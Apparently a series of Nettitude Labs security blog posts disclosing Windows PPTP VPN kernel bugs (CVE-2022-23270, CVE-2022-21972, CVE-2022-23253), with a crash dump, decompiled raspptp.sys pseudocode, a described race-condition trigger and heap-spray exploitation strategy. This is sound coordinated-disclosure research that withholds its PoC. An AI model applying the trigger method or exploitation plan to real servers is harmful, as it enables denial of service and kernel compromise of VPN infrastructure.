r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
NDIS!ndisFreeNblToNPagedPool+0x91:
fffff802`5f8d8ae1 cd29 int 29h
Resetting default scope

EXCEPTION_RECORD: ffffa8875b31e778 -- (.exr 0xffffa8875b31e778)
ExceptionAddress: fffff8025f8d8ae1 (NDIS!ndisFreeNblToNPagedPool+0x0000000000000091)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000003
Subcode: 0x3 FAST_FAIL_CORRUPT_LIST_ENTRY

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE_STR: c0000409

EXCEPTION_PARAMETER1: 0000000000000003

EXCEPTION_STR: 0xc0000409

STACK_TEXT:
ffffa887`5b31dcf8 fffff802`5b354ea2 : ffffa887`5b31de60 fffff802`5b17bb30 ffff9200`174e5180 00000000`00000000 : nt!DbgBreakPointWithStatus
ffffa887`5b31dd00 fffff802`5b3546ed : ffff9200`00000003 ffffa887`5b31de60 fffff802`5b22c910 00000000`00000139 : nt!KiVulnerabilityCheckDevulnerabilityBreak+0x12
ffffa887`5b31dd60 fffff802`5b217307 : ffffa887`5b31e4e0 ffff9200`1732a180 ffffcf88`ef584700 fffffff6`00000004 : nt!KeVulnerabilityCheck2+0xa7d
ffffa887`5b31e4c0 fffff802`5b229d69 : 00000000`00000139 00000000`00000003 ffffa887`5b31e820 ffffa887`5b31e778 : nt!KeVulnerabilityCheckEx+0x107
ffffa887`5b31e500 fffff802`5b22a1b2 : 00000000`00000000 fffff802`5f5a1285 ffffcf88`edd5c210 fffff802`5b041637 : nt!KiVulnerabilityCheckDispatch+0x69
ffffa887`5b31e640 fffff802`5b228492 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiFastFailDispatch+0xb2
ffffa887`5b31e820 fffff802`5f8d8ae1 : ffffcf88`ef584c00 ffffcf88`ef584700 00000000`00000000 00000000`00000000 : nt!KiRaiseSecurityCheckFailure+0x312
ffffa887`5b31e9b0 fffff802`5f8d5d3d : ffffcf88`f1a78350 00000000`00000000 ffffcf88`f1ae06b8 01000000`000002d0 : NDIS!ndisFreeNblToNPagedPool+0x91
ffffa887`5b31e9e0 fffff802`62bd2f7d : ffffcf88`f1ae06b8 fffff802`62bda000 ffffcf88`f1a78050 ffffcf88`f202dd70 : NDIS!NdisFreeNetBufferList+0x11d
ffffa887`5b31ea20 fffff802`62bd323f : ffffcf88`f202dd70 ffffcf88`ef57f1a0 ffffcf88`ef1fc7e8 ffffcf88`f1ae0698 : raspptp!CallFree+0x65
ffffa887`5b31ea50 fffff802`62bd348e : ffffcf88`f1a78050 00000000`00040246 ffffa887`5b31eaa0 00000000`00000018 : raspptp!CallpFinalDerefEx+0x7f
ffffa887`5b31ea80 fffff802`62bd2bad : ffffcf88`f1ae06b8 ffffcf88`f1a78050 00000000`0000000b ffffcf88`f1a78050 : raspptp!DereferenceRefCount+0x1a
ffffa887`5b31eab0 fffff802`62be37b2 : ffffcf88`f1ae0660 ffffcf88`f1ae0698 ffffcf88`f1ae06b8 ffffcf88`f1a78050 : raspptp!CallCleanup+0x61d
ffffa887`5b31eb00 fffff802`62bd72bd : ffffcf88`00000000 ffffcf88`f15ce810 00000000`00000080 fffff802`62bd7290 : raspptp!CtlpCleanup+0x112
ffffa887`5b31eb90 fffff802`5b143425 : ffffcf88`ef586040 fffff802`62bd7290 00000000`00000000 00000000`00000000 : raspptp!MainPassiveLevelThread+0x2d
ffffa887`5b31ebf0 fffff802`5b21b2a8 : ffff9200`1732a180 ffffcf88`ef586040 fffff802`5b1433d0 00000000`00000000 : nt!PspSystemThreadStartup+0x55
ffffa887`5b31ec40 00000000`00000000 : ffffa887`5b31f000 ffffa887`5b319000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28

SYMBOL_NAME: raspptp!CallFree+65

MODULE_NAME: raspptp

IMAGE_NAME: raspptp.sys

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 65

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_raspptp!CallFree

OS_VERSION: 10.0.20348.1

BUILDLAB_STR: fe_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {5d4f996e-8239-e9e8-d111-fdac16b209be}

Followup: MachineOwner
---------

It turns out that the double free trigger here is triggering a kernel assertion to be raised on a linked list. The cause of this is one of those sub objects on the call context structure we mentioned earlier. Now, while crashes are great for PoC’s they are not great for exploits, so what do we need to do next if we want to look at further exploitation more seriously?

Exploitation – Next Steps

The main way in which this particular double free scenario can be exploited would be to attempt to spray objects into the kernel heap that will instead be incorrectly freed by our second free instead of causing the above kernel vulnerability check.

The first object that might make a good contender is the call context structure itself. If we were to spray a new call context into the freed memory between the two frees being run then we would have a freed call context structure still connected to a valid and accessible control connection. This new call context structure would be comprised of mostly freed sections of memory that can then be used to cause further memory corruption and potentially achieve kernel RCE against a target server!

Conclusion

Race conditions are a particularly tricky set of vulnerabilities, especially when it comes to getting reliable exploitation. In this scenario we have a remarkably small windows of opportunity to do something potentially dangerous. Exploit development, however, is the art of taking advantage of small opportunities. Achieving RCE with this vulnerability might seem like an unlikely event but it is certainly possible! RCE is also not the only use of this vulnerability with local access to a target machine; it doubles as an opportunity for Local Privilege Escalation (LPE). All this makes CVE-2022-23270 something that in the right hands could be very dangerous.

Timeline

  • Vulnerability Reported To Microsoft – 29 October 2021
  • Vulnerability Acknowledged – 29 October 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 January 2022
  • Patch Release – 10 May 2022

The post CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) appeared first on Nettitude Labs.

CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered through sending crafted input to a vulnerable server. The vulnerability can be be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how socket object life cycles are managed by the raspptp.sys driver. In order to understand the vulnerability we must first understand some of the basics in the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The way in which the WSK API is usually used is through a set of event driven call back functions. Effectively, once a socket is set up, an application can provide a dispatch table containing a set of function pointers to be called for socket related events. In order for an application to be able to maintain its own state through these callbacks, a context structure is also provided by the driver to be given to each callback so that state can be tracked for the connection throughout its life-cycle.

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections; a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so lets break down the life cycle of how raspptp.sys handles these connections with WSK

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys.  This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEven handler. This is the callback that handles a socket accept event, aka new incoming connection.
  2. When a new client connects to the server the WskConnAcceptEvent function is called.  This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP Control connection and creates a context structure specifically for tracking the state of the clients PPTP control connection. This is the main object which we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle_1,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                lpNDISMiniportHandle_2,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                    (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                    &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                    &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only section of the socket context structure that we then care about are the following fields:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and de-increment functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys the WSK layer will dispatch a call the the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards on the incoming data to the client sockets contexts own receive data call back. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all the locking and reference increments that are used to protect the code against multi threaded access issues…

_InterlockedIncrement(&ClientCtx->ConnectionContextRefernceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

the CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
        ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
        return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increment the reference count for the PptpCtlCtx or attempt to lock access to signify that it is in use; this is potentially a vulnerability because if at any point the reference count was to be decremented then the object would be freed! However, if this is so bad, why isnt every PPTP server just crashing all the time? The answer to this question is that the CtlpEngine function actually uses the reference count correctly.

This is where things get confusing. Assuming that the raspptp.sys driver was completely single threaded, this implementation would be 100% safe as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality however, raspptp.sys is not a single threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an Ndis timer object. The actual implementation of these timers isn’t important, but what is important is that these timers dispatch there callbacks on a separate thread to that of which WSK dispatches the ReceiveData callback. Another interesting point is that both use the PptpCtlCtx structure as their context structure.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer

We can see that a 30 second timer trigger is set and when this 30 seconds is up, the CtlpWaitTimeout callback is called. This 30 second timer can be canceled but this is only done when a client performs a PPTP control handshake with the server, so assuming we never send a valid handshake after 30 seconds the callback will be dispatched. But what does this do?

The CtlpWaitTimeout function is used to handle the timer callback and it has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
        CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
        CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is the function responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the Control connection is set to CtlStateUnknown which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task to run the similarly named CtlpCleanup function onto a background worker thread which belongs to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code that will be very useful for us being able to trigger a use after free as it will always run on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and even better is that no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine function to run at the same time on seperate threads and we will be able to cause a Use after Free!

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx function because it is yet another callback. The fpCtlCtxFreeFn property is a callback function pointer to the CtlFree function. This function does a decent amount of tear down as well but the bits we care about are the following lines

WskCloseSocketContextAndFreeSocket(CtlWskContext);/
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now there is more added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn’t mean that we can’t trigger the vulnerability, since if data is already being processed by CtlpEngine when the socket is closed we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complication which make triggering it a non trivial task, but it’s still possible! Let’s take a look at what we need to happen.

  1. 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main parts of this race condition to consider are what are the limits on the data can we send to the server to spend as much time as possible in CtlpEngine parsing loop and can we do this without cancelling the timeout?

Thankfully as previously mentioned the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can get the CtlpEngine function to process any other part of the control connection, as long as we don’t start the handshake. However the state machine within CtlpEngine needs the handshake to take place to enable any other part of the control connection!

There is one part of the CtlpEngine state machine that can still be partially validly hit (without triggering an error) before the handshake has taken place. This is the EchoRequest control message type. Now we can’t actually enter the proper handling of the message type before the handshake has taken place but what we can do is use it to iterate through all the sent data in the parsing loop without triggering a parsing error. This effectively forms a way of us spinning inside the CtlpEngine function without cancelling the timeout which is exactly what we want. Even better is that this remains true when the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately the maximum amount of data we can process in one WSK receive data event callback trigger is limited to the maximum data that can be received in one TCP packet. In theory this is 65,535 bytes but due to the size limitation of Ethernet frames to 1,500 bytes we can only send ~1,450 bytes (1,500 minus the headers of the other network layer frames) of PPTP control messages in a single request. This works out at around 90 EchoRequest messages per callback event trigger. For a modern CPU this is not a lot to churn through before hopping out of the CtlpEngine function.

Another thing to consider is how do we know if the race condition was successful or a failure? Thankfully in this regard the server socket being closed on timeout works in our favour as this will cause a socket exception on the client if we attempt to send any more data once the server closes the socket. Once the socket is closed we know that the race is finished but we don’t necessarily know if we did or didn’t win the race.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept. Effectively we just continually send EchoRequest PPTP control frames in 90 frame bursts to a server until the timeout event occurs and then we hope that we’ve won the race.

We won’t be releasing the PoC code until people have had a chance to patch things up but when the PoC is successful we may see something like this on our target server:

Because the PptpCtlCtx structure is de-initialised there are a lot of pointers and properties that contain invalid values that, if used at different parts of the Receive Event handling code, will cause crashes in non fun ways like Null pointer deference’s. This is actually what happened in the Blue Screen of Death above, but the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of mitigation in the Windows kernel against memory corruption exploits and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is not possible to do so.

Exploitability – The Freed Memory

In order to asses the exploitability of the vulnerability, we need to look at what our freed memory contains and where about it is in the Windows kernel heap. In windbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UaF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0 or 672 bytes. This is important as it puts us in the allocation size range for the variable size kernel heap segment. This heap segment is fairly nice for use after free exploitation as the variable size heap also maintains a free list of chunks that have been freed and their sizes. When a new chunk is allocated this free list is searched and if a chunk of an exact or greater size match is found it will be used for the new allocation. Since this is the kernel, any other part of the kernel that allocates non paged pool memory allocations of this or a similar size could end up using this freed slot as well.

So, what do we need in order to start exploiting this issue? ideally we want to find some allocated object in the kernel that we can control the contents of and allocate at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we can then use to control the CtlpEngine state machine code. Finding an exact size match allocation isn’t the only way we could groom the heap for a potential exploit but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object what can we do? One of the most powerful bits of this vulnerability from an exploit development perspective are the callback functions located inside the PptpCtlCtx structure. Usually a mitigation called Control Flow Guard (CFG) or Xtended Flow Guard (XFG) would prevent us from being able to corrupt and use these callback pointers with an arbitrary executable kernel address. However CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog) meaning we can point execution to any instruction located in the kernel. This gives us plenty of things to abuse for exploitation purposes. A caveat to this is that we are limited to the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit or at least that’s the case on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and take control of kernel execution through a fake PptpCtlCtx object sounds great, but one additional restriction on the way in which we do this is that we only have access to CtlpEngine using the freed object for a short period of CPU time. We can’t use the same thread that is processing the CtlpEngine to allocate objects to fill the empty slot, and if we do it would be after the thread has returned from CtlpEngine. At this point the vulnerability will no longer be exploitable.

What this means is that we would need the fake object allocations to be happening in a separate thread in the hope that we can get one of our fake objects allocated and populated with our fake object contents while the vulnerable kernel thread is still in CtlpEngine, allowing us to then start doing bad things with the state machine. All of this sounds like a lot to try and get done in relatively small CPU windows, but it is possible that it could be achieved. The issue with any exploit attempting to do this is going to be reliability, since there is a fairly high chance a failed exploit would crash the target machine and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

The ability to exploit this issue for LPE is much more likely to be successful over the affected Windows kernel versions than exploiting it for RCE. This is largely due to the fact that an RCE exploit will need to be able to first leak information about the kernel using either this vulnerability or another one before any of the potential callback corruption uses would be viable. There are also far fewer parts of the kernel accessible remotely, meaning finding a way of spraying a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that the localhost socket or 127.0.0.1 allows for far more data than the ethernet frame capped 1,500 bytes we get remotely, to be processed by each WSK Receive event callback. This significantly increases most of the variables for achieving successful exploitation!

Conclusion

Wormable Kernel Remote Code Execution vulnerabilities are the holy grail of severity in modern operating systems. With great power however comes great responsibility. While this vulnerability could be catastrophic in its impact ,the skill to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master, however there are definitely those out there with the ability and determination to achieve the full potential of this vulnerability. For these reasons CVE-2022-21972 is a vulnerability that represents a very real threat to internet connected Microsoft based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability Reported To Microsoft – 29 Oct 2021
  • Vulnerability Acknowledged – 29 Oct 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 November 2021
  • Patch Release – 10 May 2022

The post CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) appeared first on Nettitude Labs.

CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected windows versions check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and VPN server. The protocol has two parts, a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for the configuring of buffering and multiplexing for network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest has no effect on the test case and just needs to be validly formed in order for the server to progress the connection state into being able to process the rest of the defined control connection frames. If you’re interested in what all these control packet frames are supposed to do or contain you can find details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).

PPTP IncomingCall Setup Procedure

In order to forward some network data to a PPTP VPN server the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server, these are outgoing calls and incoming calls. To to communicate with a VPN server from a client we typically use the incoming call variety. Finally, to set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up call ID’s for tracking the call (these ID’s are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important bit of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up data can then be sent to the GRE part of the PPTP connection using the call ID to identify the virtual call connection it belongs to.

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

